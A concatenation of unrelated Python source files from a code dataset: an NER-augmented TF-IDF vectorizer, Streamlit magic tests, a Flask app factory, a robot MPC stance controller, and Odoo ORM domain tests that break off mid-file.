return super().fit_transform(self._mixed_documents(raw_documents), y)
def transform(self, raw_documents, copy=True):
return super().transform(self._mixed_documents(raw_documents), copy)
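# A minimal usage sketch (not part of the original module). `DummyNer` is a
# hypothetical stand-in for a real recognizer exposing the `process()` interface
# described in the constructor docstring.
if __name__ == "__main__":
    class DummyNer:
        def process(self, text):
            # pretend every capitalized token is a "person" entity
            return [{"value": t, "type": "person",
                     "start": text.find(t), "end": text.find(t) + len(t)}
                    for t in text.split() if t[:1].isupper()]
    vectorizer = TfidfVectorizerWithEntity(ner=DummyNer())
    matrix = vectorizer.fit_transform(["Allen like cake", "cake is sweet"])
    print(matrix.shape)  # (2, n_terms); the vocabulary includes the injected "person" token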
|
py | b40034da55bd0ae5a7478749bf0d56c1b72a1248 | # -*- coding: utf-8 -*-
# Copyright 2018-2019 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Magic unit test."""
import unittest
import ast
import sys
import streamlit.magic as magic
is_python_2 = sys.version_info[0] == 2
class MagicTest(unittest.TestCase):
"""Test for Magic
The test counts the number of substitutions that magic.add_code do for
a few code snippets. The test passes if the expected number of
substitutions have been made.
"""
def _testCode(self, code, expected_count):
# Magic is not supported for python2.
if is_python_2:
return
tree = magic.add_magic(code, "./")
count = 0
for node in ast.walk(tree):
# count the nodes where a substitution has been made, i.e.
# look for 'calls' to a 'streamlit' function
if type(node) is ast.Call and "streamlit" in ast.dump(node.func):
count += 1
self.assertEqual(
expected_count,
count,
("There must be exactly {} streamlit nodes, but found {}").format(
expected_count, count
),
)
def test_simple_statement(self):
"""Test simple statements"""
CODE_SIMPLE_STATEMENTS = """
a = 1
b = 10
a
b
"""
self._testCode(CODE_SIMPLE_STATEMENTS, 2)
def test_if_statement(self):
"""Test if statements"""
CODE_IF_STATEMENT = """
a = 1
if True:
a
if False:
a
elif False:
a
else:
a
else:
a
"""
self._testCode(CODE_IF_STATEMENT, 5)
def test_for_statement(self):
"""Test for statements"""
CODE_FOR_STATEMENT = """
a = 1
for i in range(10):
for j in range(2):
a
"""
self._testCode(CODE_FOR_STATEMENT, 1)
def test_try_statement(self):
"""Test try statements"""
CODE_TRY_STATEMENT = """
try:
a = 10
a
except Exception:
try:
a
finally:
a
finally:
a
"""
self._testCode(CODE_TRY_STATEMENT, 4)
def test_function_call_statement(self):
"""Test with function calls"""
CODE_FUNCTION_CALL = """
def myfunc(a):
a
a =10
myfunc(a)
"""
self._testCode(CODE_FUNCTION_CALL, 1)
def test_with_statement(self):
"""Test 'with' statements"""
CODE_WITH_STATEMENT = """
a = 10
with None:
a
"""
self._testCode(CODE_WITH_STATEMENT, 1)
def test_while_statement(self):
"""Test 'while' statements"""
CODE_WHILE_STATEMENT = """
a = 10
while True:
a
"""
self._testCode(CODE_WHILE_STATEMENT, 1)
def test_yield_statement(self):
"""Test that 'yield' expressions do not get magicked"""
CODE_YIELD_STATEMENT = """
def yield_func():
yield
"""
self._testCode(CODE_YIELD_STATEMENT, 0)
def test_yield_from_statement(self):
"""Test that 'yield from' expressions do not get magicked"""
CODE_YIELD_FROM_STATEMENT = """
def yield_func():
yield from None
"""
self._testCode(CODE_YIELD_FROM_STATEMENT, 0)
def test_async_function_statement(self):
"""Test async function definitions"""
CODE_ASYNC_FUNCTION = """
async def myfunc(a):
a
"""
self._testCode(CODE_ASYNC_FUNCTION, 1)
def test_async_with_statement(self):
"""Test 'async with' statements"""
CODE_ASYNC_WITH = """
async def myfunc(a):
async with None:
a
"""
self._testCode(CODE_ASYNC_WITH, 1)
def test_async_for_statement(self):
"""Test 'async for' statements"""
CODE_ASYNC_FOR = """
async def myfunc(a):
async for _ in None:
a
"""
self._testCode(CODE_ASYNC_FOR, 1)
|
py | b40034eb71dc9ebfedb4393431c9c04b8498252f | """main module including create_app()"""
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import logging
import os
from flask import Flask
from .api_handle import create_api
from .mess import get_current_time, set_logger
try:
from .config import IS_DEBUG
except ImportError as config_import_error:
print(config_import_error.args)
raise ImportError(
"Failed to import configs. Please make sure `config.py` exists.")
def create_app(log_path='log'):
"""create initialized flask app, compatible with uwsgi"""
if not os.path.exists(log_path):
raise FileNotFoundError(f'Log path does not exist: `{log_path}`.')
set_logger(
f'{log_path}/telegram_relay_{get_current_time()}_{os.getpid()}.log')
app = Flask(__name__)
api = create_api()
api.init_app(app)
logging.info('%r', app.view_functions)
logging.info('%r', app.url_map)
return app
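# A minimal usage sketch (hypothetical import path, not part of the original file):
# a small wsgi.py exposing the factory result is enough for uwsgi or local runs, e.g.
#
#   from <package>.main import create_app   # actual package/module name not shown here
#   app = create_app(log_path='log')         # `app` is the WSGI callable uwsgi points at
#   if __name__ == "__main__":
#       app.run()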
|
py | b40035a86717ca95ca8f29d84900778b08922810 | # Lint as: python3
"""A torque based stance controller framework."""
from __future__ import absolute_import
from __future__ import division
#from __future__ import google_type_annotations
from __future__ import print_function
import os
import sys
import inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0, parentdir)
from typing import Any, Sequence, Tuple
import numpy as np
import pybullet as p # pytype: disable=import-error
try:
from mpc_controller import gait_generator as gait_generator_lib
from mpc_controller import leg_controller
except: #pylint: disable=W0702
print("You need to install motion_imitation")
print("Either run python3 setup.py install --user in this repo")
print("or use pip3 install motion_imitation --user")
sys.exit()
try:
import mpc_osqp as convex_mpc # pytype: disable=import-error
except: #pylint: disable=W0702
print("You need to install motion_imitation")
print("Either run python3 setup.py install --user in this repo")
print("or use pip3 install motion_imitation --user")
sys.exit()
_FORCE_DIMENSION = 3
# The QP weights in the convex MPC formulation. See the MIT paper for details:
# https://ieeexplore.ieee.org/document/8594448/
# Intuitively, this is the weights of each state dimension when tracking a
# desired CoM trajectory. The full CoM state is represented by
# (roll_pitch_yaw, position, angular_velocity, velocity, gravity_place_holder).
# _MPC_WEIGHTS = (5, 5, 0.2, 0, 0, 10, 0.5, 0.5, 0.2, 0.2, 0.2, 0.1, 0)
# This worked well for in-place stepping in the real robot.
# _MPC_WEIGHTS = (5, 5, 0.2, 0, 0, 10, 0., 0., 0.2, 1., 1., 0., 0)
_MPC_WEIGHTS = (5, 5, 0.2, 0, 0, 10, 0., 0., 1., 1., 1., 0., 0)
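# Index layout of the 13 weights above, following the state ordering described
# in the comment: [0:3] roll_pitch_yaw, [3:6] position, [6:9] angular_velocity,
# [9:12] velocity, [12] gravity place holder.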
_PLANNING_HORIZON_STEPS = 10
_PLANNING_TIMESTEP = 0.025
class TorqueStanceLegController(leg_controller.LegController):
"""A torque based stance leg controller framework.
Takes in high level parameters like walking speed and turning speed, and
generates necessary the torques for stance legs.
"""
def __init__(
self,
robot: Any,
gait_generator: Any,
state_estimator: Any,
desired_speed: Tuple[float, float] = (0, 0),
desired_twisting_speed: float = 0,
desired_body_height: float = 0.42,
body_mass: float = 50 / 9.8,
body_inertia: Tuple[float, float, float, float, float, float, float,
float, float] = (0.07335, 0, 0, 0, 0.25068, 0, 0, 0,
0.25447),
num_legs: int = 2,
friction_coeffs: Sequence[float] = (0.45, 0.45),
qp_solver = convex_mpc.QPOASES
):
"""Initializes the class.
Tracks the desired position/velocity of the robot by computing proper joint
torques using MPC module.
Args:
robot: A robot instance.
gait_generator: Used to query the locomotion phase and leg states.
state_estimator: Estimate the robot states (e.g. CoM velocity).
desired_speed: desired CoM speed in x-y plane.
desired_twisting_speed: desired CoM rotating speed in z direction.
desired_body_height: The standing height of the robot.
body_mass: The total mass of the robot.
body_inertia: The inertia matrix in the body principle frame. We assume
the body principle coordinate frame has x-forward and z-up.
num_legs: The number of legs used for force planning.
friction_coeffs: The friction coeffs on the contact surfaces.
"""
self._robot = robot
self._gait_generator = gait_generator
self._state_estimator = state_estimator
self.desired_speed = desired_speed
self.desired_twisting_speed = desired_twisting_speed
self._desired_body_height = desired_body_height
self._body_mass = body_mass
self._num_legs = num_legs
self._friction_coeffs = np.array(friction_coeffs)
body_inertia_list = list(body_inertia)
weights_list = list(_MPC_WEIGHTS)
self._cpp_mpc = convex_mpc.ConvexMpc(
body_mass,
body_inertia_list,
self._num_legs,
_PLANNING_HORIZON_STEPS,
_PLANNING_TIMESTEP,
weights_list,
1e-5,
qp_solver
)
def reset(self, current_time):
del current_time
def update(self, current_time):
del current_time
def get_action(self):
"""Computes the torque for stance legs."""
desired_com_position = np.array((0., 0., self._desired_body_height),
dtype=np.float64)
desired_com_velocity = np.array(
(self.desired_speed[0], self.desired_speed[1], 0.), dtype=np.float64)
desired_com_roll_pitch_yaw = np.array((0., 0., 0.), dtype=np.float64)
desired_com_angular_velocity = np.array(
(0., 0., self.desired_twisting_speed), dtype=np.float64)
foot_contact_state = np.array(
[(leg_state in (gait_generator_lib.LegState.STANCE,
gait_generator_lib.LegState.EARLY_CONTACT))
for leg_state in self._gait_generator.desired_leg_state],
dtype=np.int32)
# We use the body yaw aligned world frame for MPC computation.
com_roll_pitch_yaw = np.array(self._robot.GetBaseRollPitchYaw(),
dtype=np.float64)
com_roll_pitch_yaw[2] = 0
#predicted_contact_forces=[0]*self._num_legs*_FORCE_DIMENSION
# print("Com Vel: {}".format(self._state_estimator.com_velocity_body_frame))
# print("Com RPY: {}".format(self._robot.GetBaseRollPitchYawRate()))
# print("Com RPY Rate: {}".format(self._robot.GetBaseRollPitchYawRate()))
p.submitProfileTiming("predicted_contact_forces")
predicted_contact_forces = self._cpp_mpc.compute_contact_forces(
[0], #com_position
np.asarray(self._state_estimator.com_velocity_body_frame,
dtype=np.float64), #com_velocity
np.array(com_roll_pitch_yaw, dtype=np.float64), #com_roll_pitch_yaw
# Angular velocity in the yaw aligned world frame is actually different
# from rpy rate. We use it here as a simple approximation.
np.asarray(self._robot.GetBaseRollPitchYawRate(),
dtype=np.float64), #com_angular_velocity
foot_contact_state, #foot_contact_states
np.array(self._robot.GetFootPositionsInBaseFrame().flatten(),
dtype=np.float64), #foot_positions_base_frame
self._friction_coeffs, #foot_friction_coeffs
desired_com_position, #desired_com_position
desired_com_velocity, #desired_com_velocity
desired_com_roll_pitch_yaw, #desired_com_roll_pitch_yaw
desired_com_angular_velocity #desired_com_angular_velocity
)
p.submitProfileTiming()
# sol = np.array(predicted_contact_forces).reshape((-1, 12))
# x_dim = np.array([0, 3, 6, 9])
# y_dim = x_dim + 1
# z_dim = y_dim + 1
# print("Y_forces: {}".format(sol[:, y_dim]))
contact_forces = {}
for i in range(self._num_legs):
contact_forces[i] = np.array(
predicted_contact_forces[i * _FORCE_DIMENSION:(i + 1) *
_FORCE_DIMENSION])
action = {}
for leg_id, force in contact_forces.items():
# While "Lose Contact" is useful in simulation, in real environment it's
# susceptible to sensor noise. Disabling for now.
# if self._gait_generator.leg_state[
# leg_id] == gait_generator_lib.LegState.LOSE_CONTACT:
# force = (0, 0, 0)
motor_torques = self._robot.MapContactForceToJointTorques(leg_id, force)
for joint_id, torque in motor_torques.items():
action[joint_id] = (0, 0, 0, 0, torque)
return action, contact_forces
|
py | b40035dadd69da8fc22ff7d24fd7439198021510 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import psycopg2
from odoo.models import BaseModel
from odoo.tests.common import TransactionCase
from odoo.tools import mute_logger
from odoo.osv import expression
class TestExpression(TransactionCase):
def test_00_in_not_in_m2m(self):
# Create 4 partners with no category, or one or two categories (out of two categories).
categories = self.env['res.partner.category']
cat_a = categories.create({'name': 'test_expression_category_A'})
cat_b = categories.create({'name': 'test_expression_category_B'})
partners = self.env['res.partner']
a = partners.create({'name': 'test_expression_partner_A', 'category_id': [(6, 0, [cat_a.id])]})
b = partners.create({'name': 'test_expression_partner_B', 'category_id': [(6, 0, [cat_b.id])]})
ab = partners.create({'name': 'test_expression_partner_AB', 'category_id': [(6, 0, [cat_a.id, cat_b.id])]})
c = partners.create({'name': 'test_expression_partner_C'})
# The tests.
# On a one2many or many2many field, `in` should be read `contains` (and
# `not in` should be read `doesn't contain`.
with_a = partners.search([('category_id', 'in', [cat_a.id])])
self.assertEqual(a + ab, with_a, "Search for category_id in cat_a failed.")
with_b = partners.search([('category_id', 'in', [cat_b.id])])
self.assertEqual(b + ab, with_b, "Search for category_id in cat_b failed.")
# Partners with the category A or the category B.
with_a_or_b = partners.search([('category_id', 'in', [cat_a.id, cat_b.id])])
self.assertEqual(a + b + ab, with_a_or_b, "Search for category_id contains cat_a or cat_b failed.")
# Show that `contains list` is really `contains element or contains element`.
with_a_or_with_b = partners.search(['|', ('category_id', 'in', [cat_a.id]), ('category_id', 'in', [cat_b.id])])
self.assertEqual(a + b + ab, with_a_or_with_b, "Search for category_id contains cat_a or contains cat_b failed.")
# If we change the OR in AND...
with_a_and_b = partners.search([('category_id', 'in', [cat_a.id]), ('category_id', 'in', [cat_b.id])])
self.assertEqual(ab, with_a_and_b, "Search for category_id contains cat_a and cat_b failed.")
# Partners without category A and without category B.
without_a_or_b = partners.search([('category_id', 'not in', [cat_a.id, cat_b.id])])
self.assertFalse(without_a_or_b & (a + b + ab), "Search for category_id doesn't contain cat_a or cat_b failed (1).")
self.assertTrue(c in without_a_or_b, "Search for category_id doesn't contain cat_a or cat_b failed (2).")
# Show that `doesn't contain list` is really `doesn't contain element and doesn't contain element`.
without_a_and_without_b = partners.search([('category_id', 'not in', [cat_a.id]), ('category_id', 'not in', [cat_b.id])])
self.assertFalse(without_a_and_without_b & (a + b + ab), "Search for category_id doesn't contain cat_a and cat_b failed (1).")
self.assertTrue(c in without_a_and_without_b, "Search for category_id doesn't contain cat_a and cat_b failed (2).")
# We can exclude any partner containing the category A.
without_a = partners.search([('category_id', 'not in', [cat_a.id])])
self.assertTrue(a not in without_a, "Search for category_id doesn't contain cat_a failed (1).")
self.assertTrue(ab not in without_a, "Search for category_id doesn't contain cat_a failed (2).")
self.assertLessEqual(b + c, without_a, "Search for category_id doesn't contain cat_a failed (3).")
# (Obviously we can do the same for cateory B.)
without_b = partners.search([('category_id', 'not in', [cat_b.id])])
self.assertTrue(b not in without_b, "Search for category_id doesn't contain cat_b failed (1).")
self.assertTrue(ab not in without_b, "Search for category_id doesn't contain cat_b failed (2).")
self.assertLessEqual(a + c, without_b, "Search for category_id doesn't contain cat_b failed (3).")
def test_05_not_str_m2m(self):
partners = self.env['res.partner']
categories = self.env['res.partner.category']
cids = {}
for name in 'A B AB'.split():
cids[name] = categories.create({'name': name}).id
partners_config = {
'0': [],
'a': [cids['A']],
'b': [cids['B']],
'ab': [cids['AB']],
'a b': [cids['A'], cids['B']],
'b ab': [cids['B'], cids['AB']],
}
pids = {}
for name, cat_ids in partners_config.items():
pids[name] = partners.create({'name': name, 'category_id': [(6, 0, cat_ids)]}).id
base_domain = [('id', 'in', list(pids.values()))]
def test(op, value, expected):
found_ids = partners.search(base_domain + [('category_id', op, value)]).ids
expected_ids = [pids[name] for name in expected]
self.assertItemsEqual(found_ids, expected_ids, '%s %r should return %r' % (op, value, expected))
test('=', 'A', ['a', 'a b'])
test('!=', 'B', ['0', 'a', 'ab'])
test('like', 'A', ['a', 'ab', 'a b', 'b ab'])
test('not ilike', 'B', ['0', 'a'])
test('not like', 'AB', ['0', 'a', 'b', 'a b'])
def test_10_hierarchy_in_m2m(self):
Partner = self.env['res.partner']
Category = self.env['res.partner.category']
# search through m2m relation
partners = Partner.search([('category_id', 'child_of', self.ref('base.res_partner_category_0'))])
self.assertTrue(partners)
# setup test partner categories
categ_root = Category.create({'name': 'Root category'})
categ_0 = Category.create({'name': 'Parent category', 'parent_id': categ_root.id})
categ_1 = Category.create({'name': 'Child1', 'parent_id': categ_0.id})
# test hierarchical search in m2m with child id (list of ids)
cats = Category.search([('id', 'child_of', categ_root.ids)])
self.assertEqual(len(cats), 3)
# test hierarchical search in m2m with child id (single id)
cats = Category.search([('id', 'child_of', categ_root.id)])
self.assertEqual(len(cats), 3)
# test hierarchical search in m2m with child ids
cats = Category.search([('id', 'child_of', (categ_0 + categ_1).ids)])
self.assertEqual(len(cats), 2)
# test hierarchical search in m2m with child ids
cats = Category.search([('id', 'child_of', categ_0.ids)])
self.assertEqual(len(cats), 2)
# test hierarchical search in m2m with child ids
cats = Category.search([('id', 'child_of', categ_1.ids)])
self.assertEqual(len(cats), 1)
# test hierarchical search in m2m with an empty list
cats = Category.search([('id', 'child_of', [])])
self.assertEqual(len(cats), 0)
# test hierarchical search in m2m with 'False' value
with self.assertLogs('odoo.osv.expression'):
cats = Category.search([('id', 'child_of', False)])
self.assertEqual(len(cats), 0)
# test hierarchical search in m2m with parent id (list of ids)
cats = Category.search([('id', 'parent_of', categ_1.ids)])
self.assertEqual(len(cats), 3)
# test hierarchical search in m2m with parent id (single id)
cats = Category.search([('id', 'parent_of', categ_1.id)])
self.assertEqual(len(cats), 3)
# test hierarchical search in m2m with parent ids
cats = Category.search([('id', 'parent_of', (categ_root + categ_0).ids)])
self.assertEqual(len(cats), 2)
# test hierarchical search in m2m with parent ids
cats = Category.search([('id', 'parent_of', categ_0.ids)])
self.assertEqual(len(cats), 2)
# test hierarchical search in m2m with parent ids
cats = Category.search([('id', 'parent_of', categ_root.ids)])
self.assertEqual(len(cats), 1)
# test hierarchical search in m2m with an empty list
cats = Category.search([('id', 'parent_of', [])])
self.assertEqual(len(cats), 0)
# test hierarchical search in m2m with 'False' value
with self.assertLogs('odoo.osv.expression'):
cats = Category.search([('id', 'parent_of', False)])
self.assertEqual(len(cats), 0)
def test_10_equivalent_id(self):
# equivalent queries
Currency = self.env['res.currency']
non_currency_id = max(Currency.search([]).ids) + 1003
res_0 = Currency.search([])
res_1 = Currency.search([('name', 'not like', 'probably_unexisting_name')])
self.assertEqual(res_0, res_1)
res_2 = Currency.search([('id', 'not in', [non_currency_id])])
self.assertEqual(res_0, res_2)
res_3 = Currency.search([('id', 'not in', [])])
self.assertEqual(res_0, res_3)
res_4 = Currency.search([('id', '!=', False)])
self.assertEqual(res_0, res_4)
# equivalent queries, integer and string
Partner = self.env['res.partner']
all_partners = Partner.search([])
self.assertTrue(len(all_partners) > 1)
one = all_partners[0]
others = all_partners[1:]
res_1 = Partner.search([('id', '=', one.id)])
self.assertEqual(one, res_1)
# Partner.search([('id', '!=', others)]) # not permitted
res_2 = Partner.search([('id', 'not in', others.ids)])
self.assertEqual(one, res_2)
res_3 = Partner.search(['!', ('id', '!=', one.id)])
self.assertEqual(one, res_3)
res_4 = Partner.search(['!', ('id', 'in', others.ids)])
self.assertEqual(one, res_4)
# res_5 = Partner.search([('id', 'in', one)]) # TODO make it permitted, just like for child_of
# self.assertEqual(one, res_5)
res_6 = Partner.search([('id', 'in', [one.id])])
self.assertEqual(one, res_6)
res_7 = Partner.search([('name', '=', one.name)])
self.assertEqual(one, res_7)
res_8 = Partner.search([('name', 'in', [one.name])])
# res_9 = Partner.search([('name', 'in', one.name)]) # TODO
def test_15_m2o(self):
Partner = self.env['res.partner']
# testing equality with name
partners = Partner.search([('parent_id', '=', 'Deco Addict')])
self.assertTrue(partners)
# testing the in operator with name
partners = Partner.search([('parent_id', 'in', 'Deco Addict')])
self.assertTrue(partners)
# testing the in operator with a list of names
partners = Partner.search([('parent_id', 'in', ['Deco Addict', 'Wood Corner'])])
self.assertTrue(partners)
# check if many2one works with empty search list
partners = Partner.search([('company_id', 'in', [])])
self.assertFalse(partners)
# create new company with partners, and partners with no company
company2 = self.env['res.company'].create({'name': 'Acme 2'})
for i in range(4):
Partner.create({'name': 'P of Acme %s' % i, 'company_id': company2.id})
Partner.create({'name': 'P of All %s' % i, 'company_id': False})
# check if many2one works with negative empty list
all_partners = Partner.search([])
res_partners = Partner.search(['|', ('company_id', 'not in', []), ('company_id', '=', False)])
self.assertEqual(all_partners, res_partners, "not in [] fails")
# check that many2one will pick the correct records with a list
partners = Partner.search([('company_id', 'in', [False])])
self.assertTrue(len(partners) >= 4, "We should have at least 4 partners with no company")
# check that many2one will exclude the correct records with a list
partners = Partner.search([('company_id', 'not in', [1])])
self.assertTrue(len(partners) >= 4, "We should have at least 4 partners not related to company #1")
# check that many2one will exclude the correct records with a list and False
partners = Partner.search(['|', ('company_id', 'not in', [1]),
('company_id', '=', False)])
self.assertTrue(len(partners) >= 8, "We should have at least 8 partners not related to company #1")
# check that multi-level expressions also work
partners = Partner.search([('company_id.partner_id', 'in', [])])
self.assertFalse(partners)
# check multi-level expressions with magic columns
partners = Partner.search([('create_uid.active', '=', True)])
# check that multi-level expressions with negative op work
all_partners = Partner.search([('company_id', '!=', False)])
res_partners = Partner.search([('company_id.partner_id', 'not in', [])])
self.assertEqual(all_partners, res_partners, "not in [] fails")
# Test the '(not) like/in' behavior. res.partner and its parent_id
# column are used because parent_id is a many2one, allowing to test the
# Null value, and there are actually some null and non-null values in
# the demo data.
all_partners = Partner.search([])
non_partner_id = max(all_partners.ids) + 1
with_parent = all_partners.filtered(lambda p: p.parent_id)
without_parent = all_partners.filtered(lambda p: not p.parent_id)
with_website = all_partners.filtered(lambda p: p.website)
# We treat null values differently than in SQL. For instance in SQL:
# SELECT id FROM res_partner WHERE parent_id NOT IN (0)
# will return only the records with non-null parent_id.
# SELECT id FROM res_partner WHERE parent_id IN (0)
# will return expectedly nothing (our ids always begin at 1).
# This means the union of those two results will give only some
# records, but not all present in database.
#
# When using domains and the ORM's search method, we think it is
# more intuitive that the union returns all the records, and that
# a domain like ('parent_id', 'not in', [0]) will return all
# the records. For instance, if you perform a search for the companies
        # that don't have OpenERP as a parent company, you expect to find,
# among others, the companies that don't have parent company.
#
# existing values be treated similarly if we simply check that some
# existing value belongs to them.
res_0 = Partner.search([('parent_id', 'not like', 'probably_unexisting_name')]) # get all rows, included null parent_id
self.assertEqual(res_0, all_partners)
res_1 = Partner.search([('parent_id', 'not in', [non_partner_id])]) # get all rows, included null parent_id
self.assertEqual(res_1, all_partners)
res_2 = Partner.search([('parent_id', '!=', False)]) # get rows with not null parent_id, deprecated syntax
self.assertEqual(res_2, with_parent)
res_3 = Partner.search([('parent_id', 'not in', [])]) # get all rows, included null parent_id
self.assertEqual(res_3, all_partners)
res_4 = Partner.search([('parent_id', 'not in', [False])]) # get rows with not null parent_id
self.assertEqual(res_4, with_parent)
res_4b = Partner.search([('parent_id', 'not ilike', '')]) # get only rows without parent
self.assertEqual(res_4b, without_parent)
# The results of these queries, when combined with queries 0..4 must
# give the whole set of ids.
res_5 = Partner.search([('parent_id', 'like', 'probably_unexisting_name')])
self.assertFalse(res_5)
res_6 = Partner.search([('parent_id', 'in', [non_partner_id])])
self.assertFalse(res_6)
res_7 = Partner.search([('parent_id', '=', False)])
self.assertEqual(res_7, without_parent)
res_8 = Partner.search([('parent_id', 'in', [])])
self.assertFalse(res_8)
res_9 = Partner.search([('parent_id', 'in', [False])])
self.assertEqual(res_9, without_parent)
res_9b = Partner.search([('parent_id', 'ilike', '')]) # get those with a parent
self.assertEqual(res_9b, with_parent)
# These queries must return exactly the results than the queries 0..4,
# i.e. not ... in ... must be the same as ... not in ... .
res_10 = Partner.search(['!', ('parent_id', 'like', 'probably_unexisting_name')])
self.assertEqual(res_0, res_10)
res_11 = Partner.search(['!', ('parent_id', 'in', [non_partner_id])])
self.assertEqual(res_1, res_11)
res_12 = Partner.search(['!', ('parent_id', '=', False)])
self.assertEqual(res_2, res_12)
res_13 = Partner.search(['!', ('parent_id', 'in', [])])
self.assertEqual(res_3, res_13)
res_14 = Partner.search(['!', ('parent_id', 'in', [False])])
self.assertEqual(res_4, res_14)
# Testing many2one field is not enough, a regular char field is tested
res_15 = Partner.search([('website', 'in', [])])
self.assertFalse(res_15)
res_16 = Partner.search([('website', 'not in', [])])
self.assertEqual(res_16, all_partners)
res_17 = Partner.search([('website', '!=', False)])
self.assertEqual(res_17, with_website)
# check behavior for required many2one fields: currency_id is required
companies = self.env['res.company'].search([])
res_101 = companies.search([('currency_id', 'not ilike', '')]) # get no companies
self.assertFalse(res_101)
res_102 = companies.search([('currency_id', 'ilike', '')]) # get all companies
self.assertEqual(res_102, companies)
def test_in_operator(self):
""" check that we can use the 'in' operator for plain fields """
menus = self.env['ir.ui.menu'].search([('sequence', 'in', [1, 2, 10, 20])])
self.assertTrue(menus)
def test_15_o2m(self):
Partner = self.env['res.partner']
# test one2many operator with empty search list
partners = Partner.search([('child_ids', 'in', [])])
self.assertFalse(partners)
# test one2many operator with False
partners = Partner.search([('child_ids', '=', False)])
for partner in partners:
self.assertFalse(partner.child_ids)
# verify domain evaluation for one2many != False and one2many == False
categories = self.env['res.partner.category'].search([])
parents = categories.search([('child_ids', '!=', False)])
self.assertEqual(parents, categories.filtered(lambda c: c.child_ids))
leafs = categories.search([('child_ids', '=', False)])
self.assertEqual(leafs, categories.filtered(lambda c: not c.child_ids))
# test many2many operator with empty search list
partners = Partner.search([('category_id', 'in', [])])
self.assertFalse(partners)
# test many2many operator with False
partners = Partner.search([('category_id', '=', False)])
for partner in partners:
self.assertFalse(partner.category_id)
# filtering on nonexistent value across x2many should return nothing
partners = Partner.search([('child_ids.city', '=', 'foo')])
self.assertFalse(partners)
def test_15_equivalent_one2many_1(self):
Company = self.env['res.company']
company3 = Company.create({'name': 'Acme 3'})
company4 = Company.create({'name': 'Acme 4', 'parent_id': company3.id})
# one2many towards same model
res_1 = Company.search([('child_ids', 'in', company3.child_ids.ids)]) # any company having a child of company3 as child
self.assertEqual(res_1, company3)
res_2 = Company.search([('child_ids', 'in', company3.child_ids[0].ids)]) # any company having the first child of company3 as child
self.assertEqual(res_2, company3)
# child_of x returns x and its children (direct or not).
expected = company3 + company4
res_1 = Company.search([('id', 'child_of', [company3.id])])
self.assertEqual(res_1, expected)
res_2 = Company.search([('id', 'child_of', company3.id)])
self.assertEqual(res_2, expected)
res_3 = Company.search([('id', 'child_of', [company3.name])])
self.assertEqual(res_3, expected)
res_4 = Company.search([('id', 'child_of', company3.name)])
self.assertEqual(res_4, expected)
# parent_of x returns x and its parents (direct or not).
expected = company3 + company4
res_1 = Company.search([('id', 'parent_of', [company4.id])])
self.assertEqual(res_1, expected)
res_2 = Company.search([('id', 'parent_of', company4.id)])
self.assertEqual(res_2, expected)
res_3 = Company.search([('id', 'parent_of', [company4.name])])
self.assertEqual(res_3, expected)
res_4 = Company.search([('id', 'parent_of', company4.name)])
self.assertEqual(res_4, expected)
# try testing real subsets with IN/NOT IN
Partner = self.env['res.partner']
Users = self.env['res.users']
p1, _ = Partner.name_create("Dédé Boitaclou")
p2, _ = Partner.name_create("Raoulette Pizza O'poil")
u1a = Users.create({'login': 'dbo', 'partner_id': p1}).id
u1b = Users.create({'login': 'dbo2', 'partner_id': p1}).id
u2 = Users.create({'login': 'rpo', 'partner_id': p2}).id
self.assertEqual([p1], Partner.search([('user_ids', 'in', u1a)]).ids, "o2m IN accept single int on right side")
self.assertEqual([p1], Partner.search([('user_ids', '=', 'Dédé Boitaclou')]).ids, "o2m NOT IN matches none on the right side")
self.assertEqual([], Partner.search([('user_ids', 'in', [10000])]).ids, "o2m NOT IN matches none on the right side")
self.assertEqual([p1,p2], Partner.search([('user_ids', 'in', [u1a,u2])]).ids, "o2m IN matches any on the right side")
all_ids = Partner.search([]).ids
self.assertEqual(set(all_ids) - set([p1]), set(Partner.search([('user_ids', 'not in', u1a)]).ids), "o2m NOT IN matches none on the right side")
self.assertEqual(set(all_ids) - set([p1]), set(Partner.search([('user_ids', '!=', 'Dédé Boitaclou')]).ids), "o2m NOT IN matches none on the right side")
self.assertEqual(set(all_ids) - set([p1,p2]), set(Partner.search([('user_ids', 'not in', [u1b, u2])]).ids), "o2m NOT IN matches none on the right side")
def test_15_equivalent_one2many_2(self):
Currency = self.env['res.currency']
CurrencyRate = self.env['res.currency.rate']
# create a currency and a currency rate
currency = Currency.create({'name': 'ZZZ', 'symbol': 'ZZZ', 'rounding': 1.0})
currency_rate = CurrencyRate.create({'name': '2010-01-01', 'currency_id': currency.id, 'rate': 1.0})
non_currency_id = currency_rate.id + 1000
default_currency = Currency.browse(1)
# search the currency via its rates one2many (the one2many must point back at the currency)
currency_rate1 = CurrencyRate.search([('name', 'not like', 'probably_unexisting_name')])
currency_rate2 = CurrencyRate.search([('id', 'not in', [non_currency_id])])
self.assertEqual(currency_rate1, currency_rate2)
currency_rate3 = CurrencyRate.search([('id', 'not in', [])])
self.assertEqual(currency_rate1, currency_rate3)
# one2many towards another model
res_3 = Currency.search([('rate_ids', 'in', default_currency.rate_ids.ids)]) # currencies having a rate of main currency
self.assertEqual(res_3, default_currency)
res_4 = Currency.search([('rate_ids', 'in', default_currency.rate_ids[0].ids)]) # currencies having first rate of main currency
self.assertEqual(res_4, default_currency)
res_5 = Currency.search([('rate_ids', 'in', default_currency.rate_ids[0].id)]) # currencies having first rate of main currency
self.assertEqual(res_5, default_currency)
# res_6 = Currency.search([('rate_ids', 'in', [default_currency.rate_ids[0].name])])
# res_7 = Currency.search([('rate_ids', '=', default_currency.rate_ids[0].name)])
# res_8 = Currency.search([('rate_ids', 'like', default_currency.rate_ids[0].name)])
res_9 = Currency.search([('rate_ids', 'like', 'probably_unexisting_name')])
self.assertFalse(res_9)
# Currency.search([('rate_ids', 'unexisting_op', 'probably_unexisting_name')]) # TODO expected exception
# get the currencies referenced by some currency rates using a weird negative domain
res_10 = Currency.search([('rate_ids', 'not like', 'probably_unexisting_name')])
res_11 = Currency.search([('rate_ids', 'not in', [non_currency_id])])
